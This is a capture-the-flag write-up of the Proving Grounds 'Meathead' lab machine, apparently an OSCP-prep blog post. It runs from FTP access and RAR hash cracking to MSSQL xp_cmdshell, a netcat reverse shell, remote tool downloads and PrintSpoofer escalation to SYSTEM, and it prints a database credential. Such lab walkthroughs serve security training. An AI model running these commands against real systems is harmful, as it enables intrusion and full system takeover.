Proving grounds:Meathead
5 min readJan 10, 2023
Today we will take a look at Proving grounds: Meathead. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.
- Network
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Plantronics
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1221/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 04-27-20 07:02PM 18866 Elementum Supremum.docx
| 04-27-20 07:02PM 764176 file_example_MP3_700KB.mp3
| 04-27-20 07:02PM 15690 img.jpg
| 04-27-20 07:02PM 302 MSSQL_BAK.rar
| 04-27-20 07:02PM 548 palindromes.txt
|_04-27-20 07:02PM 45369 server.jpg
1435/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-09-20T08:08:01
|_Not valid after: 2052-09-20T08:08:01
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2023-01-10T13:25:20+00:00; -1s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-01-10T13:25:20+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=Meathead
| Not valid before: 2022-08-27T05:05:45
|_Not valid after: 2023-02-26T05:05:45
| rdp-ntlm-info:
| Target_Name: MEATHEAD
| NetBIOS_Domain_Name: MEATHEAD
| NetBIOS_Computer_Name: MEATHEAD
| DNS_Domain_Name: Meathead
| DNS_Computer_Name: Meathead
| Product_Version: 10.0.17763
|_ System_Time: 2023-01-10T13:24:45+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)- 1221 (ftp)
We can login to FTP with anonymous account.
└─$ ftp 192.168.68.70 1221
Connected to 192.168.68.70.
220 Microsoft FTP Service
Name (192.168.68.70:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49696|)
150 Opening ASCII mode data connection.
04-27-20 07:02PM 18866 Elementum Supremum.docx
04-27-20 07:02PM 764176 file_example_MP3_700KB.mp3
04-27-20 07:02PM 15690 img.jpg
04-27-20 07:02PM 302 MSSQL_BAK.rar
04-27-20 07:02PM 548 palindromes.txt
04-27-20 07:02PM 45369 server.jpg
226 Transfer complete.
ftp> mget MSSQL_BAK.rar
mget MSSQL_BAK.rar [anpqy?]? y
229 Entering Extended Passive Mode (|||49699|)
125 Data connection already open; Transfer starting.
100% |***************************************************************************************
226 Transfer complete.
- rarjohn
I can’t open the file because it’s encrypted. Extract the hash with rar2john.
rar2john MSSQL_BAK.rar > hash
- hashcat
Crack with Hashcat
hashcat -a 0 -m 13000 hash.txt rockyou.txt
- mssql
Extract the file
└─$ unrar e MSSQL_BAK.rar
─$ cat mssql_backup.txt
Username: sa
Password: EjectFrailtyThorn425 We found the credentials to login to mssql, let’s connect with impacket
─$ impacket-mssqlclient sa:'EjectFrailtyThorn425'@192.168.68.70 -p 1435
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MEATHEAD\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MEATHEAD\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL> show databases;
[-] ERROR(MEATHEAD\SQLEXPRESS): Line 1: Could not find stored procedure 'show'.
SQL> ls
[-] ERROR(MEATHEAD\SQLEXPRESS): Line 1: Could not find stored procedure 'ls'.
SQL> enable_xp_cmdshell
[*] INFO(MEATHEAD\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(MEATHEAD\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell whoami
output
--------------------------------------------------------------------------------
nt service\mssql$sqlexpress
NULL - reverse shell
SQL> xp_cmdshell mkdir c:\temp
output
--------------------------------------------------------------------------------
NULL
SQL> xp_cmdshell powershell.exe -c "iwr http://192.168.49.68/nc.exe -OutFile C:\temp\nc.exe"
output
--------------------------------------------------------------------------------
NULL
SQL> xp_cmdshell C:\temp\nc.exe -e cmd.exe 192.168.xx.xx 139
output
--------------------------------------------------------------------------------
NULL - privesc (PrintSpoofer)
C:\Windows\system32>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
=========================== ===============================================================
nt service\mssql$sqlexpress S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Monitor Users Alias S-1-5-32-558 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT SERVICE\ALL SERVICES Well-known group S-1-5-80-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
ERROR: Unable to get user claims information.
C:\Windows\system32>systeminfo
systeminfo
Host Name: MEATHEAD
OS Name: Microsoft Windows Server 2019 StandardSeImpersonatePrivilege + Microsoft Windows Server 2019 Standard = PrintSpoofer.exeC:\temp>powershell.exe -c "iwr http://192.168.xx.xx/PrintSpoofer.exe -OutFile C:\temp\PrintSpoofer.exe
C:\temp>cmd.exe /c //192.168.xx.xx/smbfolder/PrintSpoofer.exe -i -c cmd.exe
cmd.exe /c //192.168.49.68/smbfolder/PrintSpoofer.exe -i -c cmd.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.17763.1217]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\systemAnd now we are the System
“If you have any questions or comments, please do not hesitate to write. Have a good days”
